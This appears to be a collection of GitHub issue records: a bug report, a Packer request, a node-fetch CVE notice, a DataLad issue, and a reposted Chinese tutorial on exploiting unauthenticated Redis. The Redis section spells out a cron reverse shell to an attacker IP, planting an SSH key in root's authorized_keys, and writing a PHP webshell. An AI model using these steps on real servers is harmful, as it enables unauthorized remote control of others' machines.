:point_right: **[View All Console Log](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?show-logs=console_log&utm_source=github&utm_medium=integrations)** :point_left: ___ # :camera: Images [![image attachment](https://d38gnqwzxziyyy.cloudfront.net/attachments/bugs/17964813/11bce2bba325c3e8f6cb8ac8fc0ca237_one_bug_thumb/25256022/bug_1646568116972_.jpg?Expires=4802241789&Signature=DBHH1Un63Flb9CYmx6fABxQcwDGymS3Pxb0VVfAidU3RdGSZJS69rA7kd0sg-e8IEOtmjMDzEwoq58oWUfMP9G5e-q1mD1pWizmVhsJ~j53QBLTiLJkzud3Kmz8iXStzCEZCz33h52Sar3H~nMrYUOY30ABcE5nJb4tRhQVi-GeXwe9PKYHDbGzaf3bEz5sHI8Qh3AKOoTFoR9O0BjOOjvSViPEiTWqGrACBt8rXFSMr5Yv4Ympe3Es5GKriW0IYxZ6RNPhdLdCsR2kmgCy7XhR8Y5oXmNjOKmkX2s3dGMITm8C-wraJzdWmW1wV~O3VG3X3ERCw88xDC32s49LIdQ__&Key-Pair-Id=APKAIXAG65U6UUX7JAQQ)](https://d38gnqwzxziyyy.cloudfront.net/attachments/bugs/17964813/11bce2bba325c3e8f6cb8ac8fc0ca237_original/25256022/bug_1646568116972_.jpg?Expires=4802241788&Signature=d-X-UETdDieLjvRej24epfqc0YjH6lGarmcASoOEpexrwOf3D7aN4zOCjWGI1TD7YFOFcJ60CEE1-XLBSAJRFASQMc-YCHRms3tFbfB1Z1Z2GeyCCdOuacF2HHC-MFn7Vxal3hP--KL1TuD7l5FDZlzr~mG0xJVGzNtOOwoOZ3uKUrM5ca6KtKbzJgNwaNoWRq0h7gUVJbLPiOMw9dP6h2Ql14OE5rPlABqW2XvZayODK~QG5iuYRqUOlah-qcRyB~DQZc4S~hF17ZNLKGWYkJde9NXaZgDXh2VjEjirEKe1AYWatw84wMlv0SyUIGk7kOhFv2DGwcXsupAGd1O-1A__&Key-Pair-Id=APKAIXAG65U6UUX7JAQQ) ___ # :warning: Looking for More Details? 1. **Network Log**: we are unable to capture your network requests automatically. If you are using HttpUrlConnection or Okhttp requests, [**check the details mentioned here**](https://docs.instabug.com/docs/android-logging?utm_source=github&utm_medium=integrations#section-network-logs). 2. **User Events**: start capturing custom User Events to send them along with each report. [**Find all the details in the docs**](https://docs.instabug.com/docs/android-logging?utm_source=github&utm_medium=integrations). 3. **Instabug Log**: start adding Instabug logs to see them right inside each report you receive. [**Find all the details in the docs**](https://docs.instabug.com/docs/android-logging?utm_source=github&utm_medium=integrations).
non_priority
no description entered by the user clipboard bug details no description entered by the user key value reported at utc email teg ghh hhf categories report a bug tags test hello rule got applied does not contain string rule works on convert to bug instabug app version session duration device google pixel os level display xhdpi location cairo egypt en point right point left iphone view hierarchy this bug was reported from com example app main mainfragment find its interactive view hierarchy with all its subviews here point right point left chart with downwards trend session profiler here is what the app was doing right before the bug was reported key value used memory gb used storage gb connectivity wifi battery plugged orientation portrait find all the changes that happened in the parameters mentioned above during the last seconds before the bug was reported here point right point left bust in silhouette user info user attributes key name key value bla bla bla la mag right logs user steps here are the last steps done by the user right before the bug was reported in activity com example app main mainactivity fragment com example app main mainfragment was created in activity com example app main mainactivity fragment com example app main mainfragment was started in activity com example app main mainactivity fragment com example app main mainfragment was resumed com example app main mainactivity was resumed com example app splash splashactivity was stopped com example app splash splashactivity was destroyed tap in androidx constraintlayout widget constraintlayout in com example app main mainactivity com example app main mainactivity was paused in activity com example app main mainactivity fragment com example app main mainfragment was paused tap in androidx constraintlayout widget constraintlayout in com example app main mainactivity find all the user steps done by the user throughout the session here point right point left console log here are the last console logs logged right before the bug was reported d strictmode at com android okhttp internal huc httpsurlconnectionimpl getresponsecode httpsurlconnectionimpl java d strictmode at com instabug apm networkinterception b getresponsecode unknown source d strictmode at com instabug library networkmanager handlerequest networkmanager java d strictmode at com instabug library networkmanager lambda dorequest networkmanager networkmanager java d strictmode at com instabug library networkmanager run unknown source d strictmode at java util concurrent threadpoolexecutor runworker threadpoolexecutor java d strictmode at java util concurrent threadpoolexecutor worker run threadpoolexecutor java d strictmode at com instabug library util threading d a run prioritythreadfactory java d strictmode more d ib attachmentsutility encryptattachments find all the logged console logs throughout the session here point right point left camera images warning looking for more details network log we are unable to capture your network requests automatically if you are using httpurlconnection or okhttp requests user events start capturing custom user events to send them along with each report instabug log start adding instabug logs to see them right inside each report you receive
0
53,900
13,223,758,335
IssuesEvent
2020-08-17 17:49:39
hashicorp/packer
https://api.github.com/repos/hashicorp/packer
closed
Set ENV vars to override default AWS_MAX_ATTEMPTS within packer.json file
builder/amazon enhancement good first issue track-internal
Hello Team, We are using packer to build our ebs-backed AMI's but we are running into errors recently. I enabled the logging to get correct error message and it seems we are exceeding the wait attempts: ``` 2020/08/12 11:53:47 [INFO] (telemetry) ending goss ==> amazon-ebs: Stopping the source instance... amazon-ebs: Stopping instance ==> amazon-ebs: Waiting for the instance to stop... ==> amazon-ebs: Creating AMI xxxxxx from instance xxxxxx amazon-ebs: AMI: xxxxxx ==> amazon-ebs: Waiting for AMI to become ready... 2020/08/12 12:19:21 packer: 2020/08/12 12:19:21 Error waiting for AMI: ResourceNotReady: exceeded wait attempts ==> amazon-ebs: *Error waiting for AMI. Reason: <nil>* ==> amazon-ebs: Provisioning step had errors: Running the cleanup provisioner, if present... ==> amazon-ebs: Terminating the source AWS instance... ==> amazon-ebs: Cleaning up any extra volumes... ==> amazon-ebs: Deleting temporary keypair... ``` Cant we make it part of packer.json file which we use to build with packer. Wouldnt it be better if we can specify that in json file directly as optional variables Best Regards, Jashan
1.0
Set ENV vars to override default AWS_MAX_ATTEMPTS within packer.json file - Hello Team, We are using packer to build our ebs-backed AMI's but we are running into errors recently. I enabled the logging to get correct error message and it seems we are exceeding the wait attempts: ``` 2020/08/12 11:53:47 [INFO] (telemetry) ending goss ==> amazon-ebs: Stopping the source instance... amazon-ebs: Stopping instance ==> amazon-ebs: Waiting for the instance to stop... ==> amazon-ebs: Creating AMI xxxxxx from instance xxxxxx amazon-ebs: AMI: xxxxxx ==> amazon-ebs: Waiting for AMI to become ready... 2020/08/12 12:19:21 packer: 2020/08/12 12:19:21 Error waiting for AMI: ResourceNotReady: exceeded wait attempts ==> amazon-ebs: *Error waiting for AMI. Reason: <nil>* ==> amazon-ebs: Provisioning step had errors: Running the cleanup provisioner, if present... ==> amazon-ebs: Terminating the source AWS instance... ==> amazon-ebs: Cleaning up any extra volumes... ==> amazon-ebs: Deleting temporary keypair... ``` Cant we make it part of packer.json file which we use to build with packer. Wouldnt it be better if we can specify that in json file directly as optional variables Best Regards, Jashan
non_priority
set env vars to override default aws max attempts within packer json file hello team we are using packer to build our ebs backed ami s but we are running into errors recently i enabled the logging to get correct error message and it seems we are exceeding the wait attempts telemetry ending goss amazon ebs stopping the source instance amazon ebs stopping instance amazon ebs waiting for the instance to stop amazon ebs creating ami xxxxxx from instance xxxxxx amazon ebs ami xxxxxx amazon ebs waiting for ami to become ready packer error waiting for ami resourcenotready exceeded wait attempts amazon ebs error waiting for ami reason amazon ebs provisioning step had errors running the cleanup provisioner if present amazon ebs terminating the source aws instance amazon ebs cleaning up any extra volumes amazon ebs deleting temporary keypair cant we make it part of packer json file which we use to build with packer wouldnt it be better if we can specify that in json file directly as optional variables best regards jashan
0
50,277
13,505,928,426
IssuesEvent
2020-09-14 01:16:12
BrianMcDonaldWS/Ignite
https://api.github.com/repos/BrianMcDonaldWS/Ignite
opened
CVE-2020-15168 (Low) detected in node-fetch-2.5.0.tgz
security vulnerability
## CVE-2020-15168 - Low Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>node-fetch-2.5.0.tgz</b></p></summary> <p>A light-weight module that brings window.fetch to node.js</p> <p>Library home page: <a href="https://registry.npmjs.org/node-fetch/-/node-fetch-2.5.0.tgz">https://registry.npmjs.org/node-fetch/-/node-fetch-2.5.0.tgz</a></p> <p>Path to dependency file: Ignite/package.json</p> <p>Path to vulnerable library: Ignite/node_modules/node-fetch/package.json</p> <p> Dependency Hierarchy: - auto-5.0.1.tgz (Root Library) - :x: **node-fetch-2.5.0.tgz** (Vulnerable Library) </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/low_vul.png' width=19 height=20> Vulnerability Details</summary> <p> node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after fetch() has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing. <p>Publish Date: 2020-07-21 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-15168>CVE-2020-15168</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>2.6</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: High - Privileges Required: Low - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: Low </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/node-fetch/node-fetch/security/advisories/GHSA-w7rc-rwvf-8q5r">https://github.com/node-fetch/node-fetch/security/advisories/GHSA-w7rc-rwvf-8q5r</a></p> <p>Release Date: 2020-07-21</p> <p>Fix Resolution: 2.6.1,3.0.0-beta.9</p> </p> </details> <p></p> <!-- <REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"javascript/Node.js","packageName":"node-fetch","packageVersion":"2.5.0","isTransitiveDependency":true,"dependencyTree":"auto:5.0.1;node-fetch:2.5.0","isMinimumFixVersionAvailable":true,"minimumFixVersion":"2.6.1,3.0.0-beta.9"}],"vulnerabilityIdentifier":"CVE-2020-15168","vulnerabilityDetails":"node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don\u0027t double-check the size of the data after fetch() has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-15168","cvss3Severity":"low","cvss3Score":"2.6","cvss3Metrics":{"A":"Low","AC":"High","PR":"Low","S":"Unchanged","C":"None","UI":"Required","AV":"Network","I":"None"},"extraData":{}}</REMEDIATE> -->
True
CVE-2020-15168 (Low) detected in node-fetch-2.5.0.tgz - ## CVE-2020-15168 - Low Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>node-fetch-2.5.0.tgz</b></p></summary> <p>A light-weight module that brings window.fetch to node.js</p> <p>Library home page: <a href="https://registry.npmjs.org/node-fetch/-/node-fetch-2.5.0.tgz">https://registry.npmjs.org/node-fetch/-/node-fetch-2.5.0.tgz</a></p> <p>Path to dependency file: Ignite/package.json</p> <p>Path to vulnerable library: Ignite/node_modules/node-fetch/package.json</p> <p> Dependency Hierarchy: - auto-5.0.1.tgz (Root Library) - :x: **node-fetch-2.5.0.tgz** (Vulnerable Library) </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/low_vul.png' width=19 height=20> Vulnerability Details</summary> <p> node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after fetch() has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing. <p>Publish Date: 2020-07-21 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-15168>CVE-2020-15168</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>2.6</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: High - Privileges Required: Low - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: Low </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/node-fetch/node-fetch/security/advisories/GHSA-w7rc-rwvf-8q5r">https://github.com/node-fetch/node-fetch/security/advisories/GHSA-w7rc-rwvf-8q5r</a></p> <p>Release Date: 2020-07-21</p> <p>Fix Resolution: 2.6.1,3.0.0-beta.9</p> </p> </details> <p></p> <!-- <REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"javascript/Node.js","packageName":"node-fetch","packageVersion":"2.5.0","isTransitiveDependency":true,"dependencyTree":"auto:5.0.1;node-fetch:2.5.0","isMinimumFixVersionAvailable":true,"minimumFixVersion":"2.6.1,3.0.0-beta.9"}],"vulnerabilityIdentifier":"CVE-2020-15168","vulnerabilityDetails":"node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don\u0027t double-check the size of the data after fetch() has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-15168","cvss3Severity":"low","cvss3Score":"2.6","cvss3Metrics":{"A":"Low","AC":"High","PR":"Low","S":"Unchanged","C":"None","UI":"Required","AV":"Network","I":"None"},"extraData":{}}</REMEDIATE> -->
non_priority
cve low detected in node fetch tgz cve low severity vulnerability vulnerable library node fetch tgz a light weight module that brings window fetch to node js library home page a href path to dependency file ignite package json path to vulnerable library ignite node modules node fetch package json dependency hierarchy auto tgz root library x node fetch tgz vulnerable library vulnerability details node fetch before versions and beta did not honor the size option after following a redirect which means that when a content size was over the limit a fetcherror would never get thrown and the process would end without failure for most people this fix will have a little or no impact however if you are relying on node fetch to gate files above a size the impact could be significant for example if you don t double check the size of the data after fetch has completed your js thread could get tied up doing work on a large file dos and or cost you money in computing publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity high privileges required low user interaction required scope unchanged impact metrics confidentiality impact none integrity impact none availability impact low for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution beta isopenpronvulnerability false ispackagebased true isdefaultbranch true packages vulnerabilityidentifier cve vulnerabilitydetails node fetch before versions and beta did not honor the size option after following a redirect which means that when a content size was over the limit a fetcherror would never get thrown and the process would end without failure for most people this fix will have a little or no impact however if you are relying on node fetch to gate files above a size the impact could be significant for example if you don double check the size of the data after fetch has completed your js thread could get tied up doing work on a large file dos and or cost you money in computing vulnerabilityurl
0
96,748
10,962,060,982
IssuesEvent
2019-11-27 16:30:38
FreshRSS/FreshRSS
https://api.github.com/repos/FreshRSS/FreshRSS
closed
Extension on a per feed basis?
Documentation :books: Extension :electric_plug:
Sorry if this question has been asked elsewhere (I looked and couldn't see anything) - is it possible to write an extension that can be enabled on a per feed basis? For example, if I want to write an extension that calls out to an external API to provide full-text content for a specific RSS feed but not all RSS feeds in the FreshRSS installation? Thanks for any pointers
1.0
Extension on a per feed basis? - Sorry if this question has been asked elsewhere (I looked and couldn't see anything) - is it possible to write an extension that can be enabled on a per feed basis? For example, if I want to write an extension that calls out to an external API to provide full-text content for a specific RSS feed but not all RSS feeds in the FreshRSS installation? Thanks for any pointers
non_priority
extension on a per feed basis sorry if this question has been asked elsewhere i looked and couldn t see anything is it possible to write an extension that can be enabled on a per feed basis for example if i want to write an extension that calls out to an external api to provide full text content for a specific rss feed but not all rss feeds in the freshrss installation thanks for any pointers
0
48,188
5,948,671,149
IssuesEvent
2017-05-26 12:10:07
louchaooo/louchaooo.github.io
https://api.github.com/repos/louchaooo/louchaooo.github.io
opened
[转]redis未授权访问漏洞利用总结
Pentest Vul Web
### 0x01 redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。 如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。 ### 0x02 本地漏洞环境搭建 靶机:`CentOS6.5 ` #### CentOS安装redis: ``` wget http://download.redis.io/releases/redis-3.2.0.tar.gz tar xzf redis-3.2.0.tar.gz cd redis-3.2.0 make ```` 修改配置文件,使可以远程访问: ``` vim redis.conf ``` bind 127.0.0.1前面加上#号 protected-mode设为no 启动redis-server ``` ./src/redis-server redis-conf ``` 默认的配置是使用6379端口,没有密码。这时候会导致未授权访问然后使用redis权限写文件。 ### 0x03 攻击测试 nmap扫描服务器开启端口 ![image](https://cloud.githubusercontent.com/assets/12745454/26493827/567dea5e-424e-11e7-818e-4362b3ea3506.png) #### 1.redis基本命令 连接redis: ``` redis-cli -h 192.168.63.130 ``` 查看redis版本信息、一些具体信息、服务器版本信息等等: ``` 192.168.63.130:6379>info ``` 将变量x的值设为test: ``` 192.168.63.130:6379>set x "test" ``` 是把整个redis数据库删除,一般情况下不要用!!! `192.168.63.130:6379>flushall ` 查看所有键: `192.168.63.130:6379>KEYS * ` 获取默认的redis目录、和rdb文件名:可以在修改前先获取,然后走的时候再恢复。 ``` 192.168.63.130:6379>CONFIG GET dir 192.168.63.130:6379>CONFIG GET dbfilename ``` #### 2.攻击的几种方法 + (1).利用计划任务执行命令反弹shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口 `nc -lvnp 7999 ` 然后执行命令: ``` root@kali:~# redis-cli -h 192.168.63.130 192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n" OK 192.168.63.130:6379> config set dir /var/spool/cron/ OK 192.168.63.130:6379> config set dbfilename root OK 192.168.63.130:6379> save OK ``` ![image](https://cloud.githubusercontent.com/assets/12745454/26493838/6466e6ca-424e-11e7-84eb-b96b1b9cd15f.png) nc监听端口已经反弹回来shell ![image](https://cloud.githubusercontent.com/assets/12745454/26493849/6c3361da-424e-11e7-80a2-e624f13eab9b.png) ps:此处使用bash反弹shell,也可使用其他方法 + (2).写ssh-keygen公钥然后使用私钥登陆 在以下条件下,可以利用此方法 ``` 1、Redis服务使用ROOT账号启动 2、服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。 ``` 首先在本地生成一对密钥: `root@kali:~/.ssh# ssh-keygen -t rsa` ![image](https://cloud.githubusercontent.com/assets/12745454/26493867/81263ff4-424e-11e7-8909-dc02d0ff8dbd.png) 然后redis执行命令: ``` 192.168.63.130:6379> config set dir /root/.ssh/ OK 192.168.63.130:6379> config set dbfilename authorized_keys OK 192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n" OK 192.168.63.130:6379> save OK ``` save后可以直接利用公钥登录ssh ![image](https://cloud.githubusercontent.com/assets/12745454/26493879/8dae7d40-424e-11e7-98a9-80072a9df980.png) + (3).往web物理路径写webshell 当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时,可以尝试往web路径写webshell 执行以下命令 ``` 192.168.63.130:6379> config set dir /var/www/html/ OK 192.168.63.130:6379> config set dbfilename shell.php OK 192.168.63.130:6379> set x "<?php phpinfo();?>" OK 192.168.63.130:6379> save OK ``` 即可将shell写入web目录(web目录根据实际情况) ![image](https://cloud.githubusercontent.com/assets/12745454/26493887/978bc2e6-424e-11e7-8d29-47d1aea0da44.png) ### 0x04 安全配置 限制登录ip 添加密码 修改默认端口 >> 转自先知社区https://xianzhi.aliyun.com/forum/mobile/read/750.html
1.0
[转]redis未授权访问漏洞利用总结 - ### 0x01 redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。 如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。 ### 0x02 本地漏洞环境搭建 靶机:`CentOS6.5 ` #### CentOS安装redis: ``` wget http://download.redis.io/releases/redis-3.2.0.tar.gz tar xzf redis-3.2.0.tar.gz cd redis-3.2.0 make ```` 修改配置文件,使可以远程访问: ``` vim redis.conf ``` bind 127.0.0.1前面加上#号 protected-mode设为no 启动redis-server ``` ./src/redis-server redis-conf ``` 默认的配置是使用6379端口,没有密码。这时候会导致未授权访问然后使用redis权限写文件。 ### 0x03 攻击测试 nmap扫描服务器开启端口 ![image](https://cloud.githubusercontent.com/assets/12745454/26493827/567dea5e-424e-11e7-818e-4362b3ea3506.png) #### 1.redis基本命令 连接redis: ``` redis-cli -h 192.168.63.130 ``` 查看redis版本信息、一些具体信息、服务器版本信息等等: ``` 192.168.63.130:6379>info ``` 将变量x的值设为test: ``` 192.168.63.130:6379>set x "test" ``` 是把整个redis数据库删除,一般情况下不要用!!! `192.168.63.130:6379>flushall ` 查看所有键: `192.168.63.130:6379>KEYS * ` 获取默认的redis目录、和rdb文件名:可以在修改前先获取,然后走的时候再恢复。 ``` 192.168.63.130:6379>CONFIG GET dir 192.168.63.130:6379>CONFIG GET dbfilename ``` #### 2.攻击的几种方法 + (1).利用计划任务执行命令反弹shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口 `nc -lvnp 7999 ` 然后执行命令: ``` root@kali:~# redis-cli -h 192.168.63.130 192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n" OK 192.168.63.130:6379> config set dir /var/spool/cron/ OK 192.168.63.130:6379> config set dbfilename root OK 192.168.63.130:6379> save OK ``` ![image](https://cloud.githubusercontent.com/assets/12745454/26493838/6466e6ca-424e-11e7-84eb-b96b1b9cd15f.png) nc监听端口已经反弹回来shell ![image](https://cloud.githubusercontent.com/assets/12745454/26493849/6c3361da-424e-11e7-80a2-e624f13eab9b.png) ps:此处使用bash反弹shell,也可使用其他方法 + (2).写ssh-keygen公钥然后使用私钥登陆 在以下条件下,可以利用此方法 ``` 1、Redis服务使用ROOT账号启动 2、服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。 ``` 首先在本地生成一对密钥: `root@kali:~/.ssh# ssh-keygen -t rsa` ![image](https://cloud.githubusercontent.com/assets/12745454/26493867/81263ff4-424e-11e7-8909-dc02d0ff8dbd.png) 然后redis执行命令: ``` 192.168.63.130:6379> config set dir /root/.ssh/ OK 192.168.63.130:6379> config set dbfilename authorized_keys OK 192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n" OK 192.168.63.130:6379> save OK ``` save后可以直接利用公钥登录ssh ![image](https://cloud.githubusercontent.com/assets/12745454/26493879/8dae7d40-424e-11e7-98a9-80072a9df980.png) + (3).往web物理路径写webshell 当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时,可以尝试往web路径写webshell 执行以下命令 ``` 192.168.63.130:6379> config set dir /var/www/html/ OK 192.168.63.130:6379> config set dbfilename shell.php OK 192.168.63.130:6379> set x "<?php phpinfo();?>" OK 192.168.63.130:6379> save OK ``` 即可将shell写入web目录(web目录根据实际情况) ![image](https://cloud.githubusercontent.com/assets/12745454/26493887/978bc2e6-424e-11e7-8d29-47d1aea0da44.png) ### 0x04 安全配置 限制登录ip 添加密码 修改默认端口 >> 转自先知社区https://xianzhi.aliyun.com/forum/mobile/read/750.html
non_priority
redis未授权访问漏洞利用总结 redis介绍 redis是一个开源的使用ansi c语言编写、支持网络、可基于内存亦可持久化的日志型、key value数据库,并提供多种语言的api。 ,redis的开发工作由vmware主持。 ,redis的开发由pivotal赞助。 redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可通过eval执行lua代码,或通过数据备份功能往磁盘写入后门文件。 如果redis以root身份运行,可以给root账户写入ssh公钥文件,直接通过ssh登录受害服务器。 本地漏洞环境搭建 靶机: centos安装redis: wget tar xzf redis tar gz cd redis make 修改配置文件,使可以远程访问: vim redis conf bind 号 protected mode设为no 启动redis server src redis server redis conf ,没有密码。这时候会导致未授权访问然后使用redis权限写文件。 攻击测试 nmap扫描服务器开启端口 redis基本命令 连接redis: redis cli h 查看redis版本信息、一些具体信息、服务器版本信息等等: info 将变量x的值设为test: set x test 是把整个redis数据库删除,一般情况下不要用!!! flushall 查看所有键: keys 获取默认的redis目录、和rdb文件名:可以在修改前先获取,然后走的时候再恢复。 config get dir config get dbfilename 攻击的几种方法 利用计划任务执行命令反弹shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口 nc lvnp 然后执行命令 root kali redis cli h set x n bash i dev tcp n ok config set dir var spool cron ok config set dbfilename root ok save ok nc监听端口已经反弹回来shell ps 此处使用bash反弹shell,也可使用其他方法 写ssh keygen公钥然后使用私钥登陆 在以下条件下,可以利用此方法 、redis服务使用root账号启动 、服务器开放了ssh服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。 首先在本地生成一对密钥: root kali ssh ssh keygen t rsa 然后redis执行命令: config set dir root ssh ok config set dbfilename authorized keys ok set x n n nssh rsa re ehygoav llexfaag vqbx root kali n n n ok save ok save后可以直接利用公钥登录ssh 往web物理路径写webshell 当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时,可以尝试往web路径写webshell 执行以下命令 config set dir var www html ok config set dbfilename shell php ok set x ok save ok 即可将shell写入web目录 web目录根据实际情况 安全配置 限制登录ip 添加密码 修改默认端口 转自先知社区
0
12,220
7,810,143,040
IssuesEvent
2018-06-12 05:10:03
datalad/datalad
https://api.github.com/repos/datalad/datalad
closed
git config calls are again abundant
performance
#### What is the problem? While testing the introduced lean'ish test for #2406 I was surprised with the 'slowness' of it. Looked at what is called and apparently it seems that `git config` calls are again quite abundant imho without a reason (duplicates etc while nothing is really changing in the repo): ```shell $> DATALAD_LOG_TIMESTAMP=1 DATALAD_LOG_LEVEL=1 python -m nose -s -v datalad/interface/tests/test_save.py:test_symlinked_relpath 2>&1 | tools/dtime | grep git.*config 21 2018-04-10 14:10:32,194 [Level 9] Running: ['git', 'config', 'user.name'] 0 2018-04-10 14:10:32,215 [Level 8] Finished running ['git', 'config', 'user.name'] with status 0 22 2018-04-10 14:10:32,215 [Level 9] Running: ['git', 'config', 'user.email'] 1 2018-04-10 14:10:32,237 [Level 8] Finished running ['git', 'config', 'user.email'] with status 0 18 2018-04-10 14:10:32,256 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 2 2018-04-10 14:10:32,274 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 21 2018-04-10 14:10:32,277 [Level 9] Running: ['git', 'config', 'user.name'] 0 2018-04-10 14:10:32,298 [Level 8] Finished running ['git', 'config', 'user.name'] with status 0 17 2018-04-10 14:10:32,298 [Level 9] Running: ['git', 'config', 'user.email'] 1 2018-04-10 14:10:32,315 [Level 8] Finished running ['git', 'config', 'user.email'] with status 0 17 2018-04-10 14:10:32,393 